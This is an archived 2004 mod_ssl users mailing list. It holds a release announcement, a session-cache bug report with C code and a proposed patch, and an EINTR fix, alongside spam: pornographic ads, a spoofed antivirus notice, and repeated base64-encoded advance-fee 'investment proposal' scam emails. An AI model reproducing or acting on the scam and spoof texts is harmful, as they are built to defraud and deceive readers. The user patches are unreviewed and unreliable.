PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1tYWlsIC0tPg0KPGh0
bWw+DQoNCjxoZWFkPg0KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
RnJvbnRQYWdlIDUuMCI+DQo8bWV0YSBuYW1lPSJQcm9nSWQiIGNvbnRlbnQ9IkZyb250UGFnZS5F
ZGl0b3IuRG9jdW1lbnQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50
PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8dGl0bGU+t3O8V7r0rbYxPC90aXRsZT4NCjwv
aGVhZD4NCg0KPGJvZHk+DQoNCjxwIGFsaWduPSJjZW50ZXIiPg0KPGEgaHJlZj0iaHR0cDovL3No
b3AzMTguaGlwZXJtYWxsLmhpbmV0Lm5ldC9TaG9wU3R5bGUvYW90aDEvR29vZHNEZXNjci5hc3A/
Y2F0ZWdvcnlfaWQ9MzQ2JnBhcmVudF9pZD0zNDQmcHJvZF9pZD1MTTA2MDAwMTYiPjxpbWcgYm9y
ZGVyPSIwIiBzcmM9Imh0dHA6Ly9zaG9wMzE4LmhpcGVybWFsbC5oaW5ldC5uZXQvc3RvcmUvZjQv
pXjGUblxpGyz+DAwMi5qcGciIHdpZHRoPSI2MjAiIGhlaWdodD0iMTE0NCI+PC9hPjwvcD4NCg0K
PC9ib2R5Pg0KDQo8L2h0bWw+


------=_NextPart_GeYHHYFPN5cgVKAA--
------=_NextPart_GeYHHYFPN5cgVK--




From owner-modssl-users@modssl.org  Fri May  7 07:49:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8928A8A49; Fri,  7 May 2004 07:49:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (ACC75436.ipt.aol.com [172.199.84.54])
	by master.modssl.org (Postfix) with SMTP id A6F1DA8958
	for ; Fri,  7 May 2004 07:49:31 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: very hot XXX
Date: 06 May 2004 22:54:48 -0800
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040507054931.A6F1DA8958@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 12 15:25:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 29F92A8A6D; Wed, 12 May 2004 15:25:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP
	id 9F916A8943; Wed, 12 May 2004 15:25:07 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8E1CE4CE551; Wed, 12 May 2004 15:25:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 14E8B28637; Wed, 12 May 2004 15:24:57 +0200 (CEST)
Date: Wed, 12 May 2004 15:24:57 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
Message-ID: <20040512132456.GA80566@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yesterday Apache 1.3.31 was released. I've updated mod_ssl 2.8 to this
version and released the result (together with some other pending
bugfixes; see below) as mod_ssl 2.8.17-1.3.31. You can find it under the
usual locations:

  o http://www.modssl.org/source/
  o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.17 (01-Nov-2003 to 11-May-2004)

   *) Upgraded to Apache 1.3.31

   *) Log the OpenSSL error stack contents if the crypto engine
      load/init fails.

   *) Fixed segfault in lookup of variable SESSION_ID
      in case SSL_get_session() returns NULL.

   *) Bugfix "dbm" session cache: the DBM file was closed
      too early (before accessing the data).

   *) Bugfix "shmcb" session cache for situations where
      the session data is bigger than the cache size.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 14 14:56:10 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C157AA89E6; Fri, 14 May 2004 14:56:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.seclutions.com (adsl-135-98.init7.net [213.144.135.98])
	by master.modssl.org (Postfix) with ESMTP id D7F75A8939
	for ; Fri, 14 May 2004 14:55:53 +0200 (CEST)
Received: from scotty.seclutions.com (scotty [172.18.1.1])
	by mail.seclutions.com (Postfix) with ESMTP id 8F4BD2B0C
	for ; Fri, 14 May 2004 14:55:40 +0200 (MEST)
Received: from [172.18.1.101] (localhost [127.0.0.1])
	by scotty.seclutions.com (Postfix) with ESMTP id 4192C4BA8C
	for ; Fri, 14 May 2004 14:55:40 +0200 (MEST)
Date: Fri, 14 May 2004 14:57:17 +0200
From: Erwin Huber 
To: modssl-users@modssl.org
Subject: Cannot find peer certificate chain
Message-ID: <6A75540902AA665866533433@[172.18.1.101]>
X-Mailer: Mulberry/3.1.3 (Win32)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Erwin Huber 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear all

I'm using the following components:

    * apache 1.3.29
    * mod_ssl 2.8.16-1.3.29
    * openssl 0.9.7d
    * mm 1.3.0
    * Solaris 8

I've configured: SSLSessionCache 
shmcb:/opt/slt/ses/apache/run/ssl_scache(512000)

The problem only occures if we use client certs. If we do multiple requests 
on the same ssl session then I get an error the *first time* the request is 
handled by the *same* apache child that has stored the SSL session ID in 
the cache. All other childs can acces the cache without problems.

trace output in ssl_engine_log (debug level does not provide better info):

[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Handshake: start
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: before/accept 
initialization
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 read client hello 
A
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 write server 
hello A
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 write change 
cipher spec A
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 write finished A
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 flush data
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Loop: SSLv3 read finished A
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Handshake: done
[21/Apr/2004 09:48:18 01201] [info] Connection: Client IP: 192.168.167.99, 
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[21/Apr/2004 09:48:18 01201] [info] Initial (No.1) HTTPS request received 
for child 0 (server airlock_baumi.ergon.ch:4442)
[21/Apr/2004 09:48:18 01201] [trace] Changed client verification type will 
force quick renegotiation
[21/Apr/2004 09:48:18 01201] [info] Requesting connection re-negotiation
[21/Apr/2004 09:48:18 01201] [trace] Performing quick renegotiation: just 
re-verifying the peer
[21/Apr/2004 09:48:18 01201] [error] Cannot find peer certificate chain
[21/Apr/2004 09:48:18 01201] [trace] OpenSSL: Write: SSL negotiation 
finished successfully
[21/Apr/2004 09:48:18 01201] [info] Connection to child 0 closed with 
standard shutdown (server airlock_baumi.ergon.ch:4442, client 
192.168.167.99)

I wonder about the "Cannot find peer certificate chain" and then the "SSL 
negotiation finished successfully". hmmm.

If we use dbm instead of shmcb then this problem does not occure.

I had a look at the source code.
ssl_engine_kernel.c, line 963:

            ssl_log(r->server, SSL_LOG_TRACE,
                    "Performing quick renegotiation: just re-verifying the 
peer");
            certstack = SSL_get_peer_cert_chain(ssl);
            cert = SSL_get_peer_certificate(ssl);
            if (certstack == NULL && cert != NULL) {
                /* client certificate is in the SSL session cache, but
                   there is no chain, since ssl3_get_client_certificate()
                   sk_X509_shift()'ed the peer certificate out of the
                   chain. So we put it back here for the purpose of quick
                   renegotiation. */
                certstack = sk_new_null();
                sk_X509_push(certstack, cert);
            }
            if (certstack == NULL || sk_X509_num(certstack) == 0) {
                ssl_log(r->server, SSL_LOG_ERROR, "Cannot find peer 
certificate chain");
                return FORBIDDEN;
            }

If I omit the check on certstack == NULL with the following change:
            if (cert != NULL) {
                /* client certificate is in the SSL session cache, but
                   there is no chain, since ssl3_get_client_certificate()
                   sk_X509_shift()'ed the peer certificate out of the
                   chain. So we put it back here for the purpose of quick
                   renegotiation. */
                certstack = sk_new_null();
                sk_X509_push(certstack, cert);
            }

then the error does not occure.

Since there was no change in ssl_engine_kernel.c in version 2.8.17-1.3.31
I do not expect that this behaviour has changed. Of course I will do the 
tests
again with updated apache and mod_ssl.

My question is now:
Does anybody know about a problem in this area?
What are the side-effects of my code change?

You can see the details also here: http://cvs.ossp.org/tktview?tn=46

thanks for any ideas and replies
Erwin Huber

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 15 02:19:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4C5BAA89A3; Sat, 15 May 2004 02:19:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web50209.mail.yahoo.com (web50209.mail.yahoo.com [206.190.38.50])
	by master.modssl.org (Postfix) with SMTP id C7F42A895E
	for ; Sat, 15 May 2004 02:18:56 +0200 (CEST)
Message-ID: <20040515001832.75512.qmail@web50209.mail.yahoo.com>
Received: from [80.67.64.10] by web50209.mail.yahoo.com via HTTP; Fri, 14 May 2004 17:18:32 PDT
Date: Fri, 14 May 2004 17:18:32 -0700 (PDT)
From: a k 
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
To: modssl-users@modssl.org
In-Reply-To: <20040512132456.GA80566@engelschall.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Did you add my eintr fix ?



If an interrupt (EINTR) occurs during the handshake
the current code will abort the handshake with:

                ssl_log(srvr,
SSL_LOG_ERROR|SSL_ADD_SSLERR|SSL_ADD_ERRNO,
                        "SSL handshake failed (server
%s, client %s)", cpVHostID,
                        conn->remote_ip != NULL ?
conn->remote_ip : "unknown");

-- the following will fix this problem:

                int err;

                err = SSL_get_error(ssl, rc);
                if( err == SSL_ERROR_WANT_READ &&
                                 
BIO_should_retry(SSL_get_rbio(ssl)) ) {
                    ssl_log(srvr,SSL_LOG_INFO,"SSL
READ ERROR IGNORED on pid (%d)\n",getpid());
                    continue;
                } else if( err == SSL_ERROR_WANT_WRITE
&&
                                 
BIO_should_retry(SSL_get_wbio(ssl)) ) {
                    ssl_log(srvr,SSL_LOG_INFO,"SSL
READ ERROR IGNORED on pid (%d)\n",getpid());
                    continue;
                }

--- "Ralf S. Engelschall"  wrote:
> Yesterday Apache 1.3.31 was released. I've updated
> mod_ssl 2.8 to this
> version and released the result (together with some
> other pending
> bugfixes; see below) as mod_ssl 2.8.17-1.3.31. You
> can find it under the
> usual locations:
> 
>   o http://www.modssl.org/source/
>   o  ftp://ftp.modssl.org/source/
> 
> Yours,
>                                        Ralf S.
> Engelschall
>                                       
> rse@engelschall.com
>                                       
> www.engelschall.com
> 
>   Changes with mod_ssl 2.8.17 (01-Nov-2003 to
> 11-May-2004)
> 
>    *) Upgraded to Apache 1.3.31
> 
>    *) Log the OpenSSL error stack contents if the
> crypto engine
>       load/init fails.
> 
>    *) Fixed segfault in lookup of variable
> SESSION_ID
>       in case SSL_get_session() returns NULL.
> 
>    *) Bugfix "dbm" session cache: the DBM file was
> closed
>       too early (before accessing the data).
> 
>    *) Bugfix "shmcb" session cache for situations
> where
>       the session data is bigger than the cache
> size.
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org



	
		
__________________________________
Do you Yahoo!?
SBC Yahoo! - Internet access at a great low price.
http://promo.yahoo.com/sbc/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From james33@moldova.cc  Wed May 19 12:28:37 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from moldova.cc (sfe02.mdl.net [195.22.225.34])
	by master.modssl.org (Postfix) with ESMTP id 3920CA8933
	for ; Wed, 19 May 2004 12:28:11 +0200 (CEST)
Received: (apparently) from moldova.cc ([195.22.225.39]) by moldova.cc  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 18 May 2004 18:52:03 +0300
Received: from [195.22.230.138:2010]  by 195.22.225.39  with MDL SMTP Proxy;
	ID {8CE682A8-0896-4F36-9E75-34BF88A82E36};  18.05.2004 18:52:08.730 +0300
Message-ID: <160601-22004521815528653@moldova.cc>
X-EM-Version: 6, 0, 0, 4
X-EM-Registration: #0010630410721500AB30
X-Originating-IP: [192.116.135.53]
From: "james33" 
To: mhonarc-users@mhonarc.org
Subject: INVESTMENT PROPOSAL
Date: Tue, 18 May 2004 18:52:08 +0300
MIME-Version: 1.0
Content-Type: text/html; charset=windows-1251
Content-Transfer-Encoding: base64

DQpGcm9tIFRoZSBEZXNrIFRvcCBPZiBNciBKYW1lcyBBbWFkaSwNCk1EL0NFTyBPZiBUaGUgRmlu
YW5jaWFsIENvbnN1bHRhbnQsDQpGZWRlcmFsIFJlcHVibGljIE9mIE5pZ2VyaWEuIA0KDQpBVFRO
OiANCkkgaGF2ZSBpbnRlcmVzdCBvZiBpbnZlc3RpbmcgaW4geW91ciBjb3VudHJ5IGFzIHN1Y2gg
SQ0KZGVjaWRlZCB0byBlc3RhYmxpc2ggY29udGFjdCB3aXRoIHlvdSBmb3IgYXNzaXN0YW5jZQ0K
YXMgc29vbiBhcyBJIGFtIGFibGUgdG8gdHJhbnNmZXIgbXkgZnVuZHMgZm9yIHRoaXMNCmludmVz
dG1lbnQsIHdoaWNoIGlzIGFscmVhZHkgd2l0aCBhIHNlY3VyaXR5IGNvbXBhbnkNCmluIEV1cm9w
ZS4gDQpUaGVyZSBhcmUgdHdvIGJhc2ljIHRoaW5ncyBpIHdvdWxkIHdhbnQgeW91IHRvIGFzc2lz
dA0KbWUgaW47DQogDQooMSkgSGVscGluZyBhcyBhIGZyb250IGNvbGxlY3QgdGhlc2UgZnVuZHMg
ZnJvbSB0aGUNCnNlY3VyaXR5IGNvbXBhbnkgaW4gRXVyb3BlLlRoaXMgaXMgYmVjYXVzZSBvZiBt
eQ0KaW5hYmlsaXR5IHRvIHRyYXZlbCBvdXQgb2YgdGhlIGNvdW50cnkgd2hpY2ggaSBhbQ0KdGFr
aW5nIHJlZnVnZSBhdCB0aGUgbW9tZW50IHdpdGggbXkgd2lmZSBhbmQgY2hpbGRyZW4NCndoaWNo
IGkgd2lsbCBleHBsYWluIGJldHRlciB0byB5b3UgdXBvbiB0aGUgcmVjZWlwdCBvZg0KeW91ciBh
Y2NlcHRhbmNlLg0KIA0KKDIpSGVscGluZyBtZSB0byBjYXJyeSBvdXQgZmVhc2liaWxpdHkgc3R1
ZHkgb24NCmFyZWFzL2Nob2ljZSBvZiBpbnZlc3RtZW50IHlvdSBkZWVtIGJlc3QgZm9yIG1lLkkN
CnJldGlyZWQgYXMgZmluYW5jaWFsIGNvbnN1bHRhbnQgYW5kIHdhcyB0aGUgbGFzdA0KcGVyc29u
YWwgZmluYW5jaWFsIGFkdmlzZXIgdG8gdGhlIGV4LSBoZWFkIG9mIHN0YXRlDQpiZWZvcmUgaGlz
IGRlbWlzZSBhbmQgaGF2ZSBubyBpbnRlbnRpb24gb2YgY2FycnlpbmcNCm91dCBhbnkgZnVydGhl
ciBpbnZlc3RtZW50IHByb2dyYW1tZSBpbiBteSBjb3VudHJ5IGZvcg0Kc2VjdXJpdHkgcmVhc29u
cy4gDQoNClBsZWFzZSBpZiB5b3Ugd291bGQgYXNzaXN0IG1lLGRvIHJlcGx5IHRoaXMgbWFpbA0K
dGhyb3VnaCB0aGUgYWJvdmUgZW1haWwgb3IgbXkgcHJpdmF0ZSBlbWFpbCBhZGRyZXNzDQooamFt
ZXNfZHJAbXl3YXkuY29tKQ0KRW5jbG9zaW5nIHlvdXIgdGVsZXBob25lIGFuZCBmYXggbnVtYmVy
cy4NCiANClRoYW5rcywgDQoNCllvdXJzIHNpbmNlcmVseSwNCiANCkRyIEphbWVzIEFtYWRpDQoN
Cg==


From james33@moldova.cc  Wed May 19 12:39:21 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from moldova.cc (sfe02.mdl.net [195.22.225.34])
	by master.modssl.org (Postfix) with ESMTP id BB707A89E6
	for ; Wed, 19 May 2004 12:39:17 +0200 (CEST)
Received: (apparently) from moldova.cc ([195.22.225.39]) by moldova.cc  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 18 May 2004 18:52:03 +0300
Received: from [195.22.230.154:2680]  by 195.22.225.39  with MDL SMTP Proxy;
	ID {F4F91822-B57F-4ED9-B965-537BC058F5DB};  18.05.2004 18:52:08.667 +0300
Message-ID: <109931-22004521815528656@moldova.cc>
X-Originating-IP: [195.171.200.235]
From: "james33" 
To: mhonarc-users@mhonarc.org
Subject: INVESTMENT PROPOSAL
Date: Tue, 18 May 2004 18:52:08 +0300
MIME-Version: 1.0
Content-Type: text/html; charset=windows-1251
Content-Transfer-Encoding: base64

DQpGcm9tIFRoZSBEZXNrIFRvcCBPZiBNciBKYW1lcyBBbWFkaSwNCk1EL0NFTyBPZiBUaGUgRmlu
YW5jaWFsIENvbnN1bHRhbnQsDQpGZWRlcmFsIFJlcHVibGljIE9mIE5pZ2VyaWEuIA0KDQpBVFRO
OiANCkkgaGF2ZSBpbnRlcmVzdCBvZiBpbnZlc3RpbmcgaW4geW91ciBjb3VudHJ5IGFzIHN1Y2gg
SQ0KZGVjaWRlZCB0byBlc3RhYmxpc2ggY29udGFjdCB3aXRoIHlvdSBmb3IgYXNzaXN0YW5jZQ0K
YXMgc29vbiBhcyBJIGFtIGFibGUgdG8gdHJhbnNmZXIgbXkgZnVuZHMgZm9yIHRoaXMNCmludmVz
dG1lbnQsIHdoaWNoIGlzIGFscmVhZHkgd2l0aCBhIHNlY3VyaXR5IGNvbXBhbnkNCmluIEV1cm9w
ZS4gDQpUaGVyZSBhcmUgdHdvIGJhc2ljIHRoaW5ncyBpIHdvdWxkIHdhbnQgeW91IHRvIGFzc2lz
dA0KbWUgaW47DQogDQooMSkgSGVscGluZyBhcyBhIGZyb250IGNvbGxlY3QgdGhlc2UgZnVuZHMg
ZnJvbSB0aGUNCnNlY3VyaXR5IGNvbXBhbnkgaW4gRXVyb3BlLlRoaXMgaXMgYmVjYXVzZSBvZiBt
eQ0KaW5hYmlsaXR5IHRvIHRyYXZlbCBvdXQgb2YgdGhlIGNvdW50cnkgd2hpY2ggaSBhbQ0KdGFr
aW5nIHJlZnVnZSBhdCB0aGUgbW9tZW50IHdpdGggbXkgd2lmZSBhbmQgY2hpbGRyZW4NCndoaWNo
IGkgd2lsbCBleHBsYWluIGJldHRlciB0byB5b3UgdXBvbiB0aGUgcmVjZWlwdCBvZg0KeW91ciBh
Y2NlcHRhbmNlLg0KIA0KKDIpSGVscGluZyBtZSB0byBjYXJyeSBvdXQgZmVhc2liaWxpdHkgc3R1
ZHkgb24NCmFyZWFzL2Nob2ljZSBvZiBpbnZlc3RtZW50IHlvdSBkZWVtIGJlc3QgZm9yIG1lLkkN
CnJldGlyZWQgYXMgZmluYW5jaWFsIGNvbnN1bHRhbnQgYW5kIHdhcyB0aGUgbGFzdA0KcGVyc29u
YWwgZmluYW5jaWFsIGFkdmlzZXIgdG8gdGhlIGV4LSBoZWFkIG9mIHN0YXRlDQpiZWZvcmUgaGlz
IGRlbWlzZSBhbmQgaGF2ZSBubyBpbnRlbnRpb24gb2YgY2FycnlpbmcNCm91dCBhbnkgZnVydGhl
ciBpbnZlc3RtZW50IHByb2dyYW1tZSBpbiBteSBjb3VudHJ5IGZvcg0Kc2VjdXJpdHkgcmVhc29u
cy4gDQoNClBsZWFzZSBpZiB5b3Ugd291bGQgYXNzaXN0IG1lLGRvIHJlcGx5IHRoaXMgbWFpbA0K
dGhyb3VnaCB0aGUgYWJvdmUgZW1haWwgb3IgbXkgcHJpdmF0ZSBlbWFpbCBhZGRyZXNzDQooamFt
ZXNfZHJAbXl3YXkuY29tKQ0KRW5jbG9zaW5nIHlvdXIgdGVsZXBob25lIGFuZCBmYXggbnVtYmVy
cy4NCiANClRoYW5rcywgDQoNCllvdXJzIHNpbmNlcmVseSwNCiANCkRyIEphbWVzIEFtYWRpDQoN
Cg==


From james33@moldova.cc  Wed May 19 13:53:13 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from moldova.cc (sfe02.mdl.net [195.22.225.34])
	by master.modssl.org (Postfix) with ESMTP id 842C0A8972
	for ; Wed, 19 May 2004 13:53:02 +0200 (CEST)
Received: (apparently) from moldova.cc ([195.22.225.39]) by moldova.cc  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Tue, 18 May 2004 18:52:24 +0300
Received: from [195.22.230.138:2017]  by 195.22.225.39  with MDL SMTP Proxy;
	ID {E7316DF8-E63D-4732-AC9B-4D7AA34A5A3E};  18.05.2004 18:52:25.730 +0300
Message-ID: <214661-220045218155225684@moldova.cc>
X-EM-Version: 6, 0, 0, 4
X-EM-Registration: #0010630410721500AB30
X-Originating-IP: [192.116.135.53]
From: "james33" 
To: mhonarc-users@mhonarc.org
Subject: INVESTMENT PROPOSAL
Date: Tue, 18 May 2004 18:52:25 +0300
MIME-Version: 1.0
Content-Type: text/html; charset=windows-1251
Content-Transfer-Encoding: base64

DQpGcm9tIFRoZSBEZXNrIFRvcCBPZiBNciBKYW1lcyBBbWFkaSwNCk1EL0NFTyBPZiBUaGUgRmlu
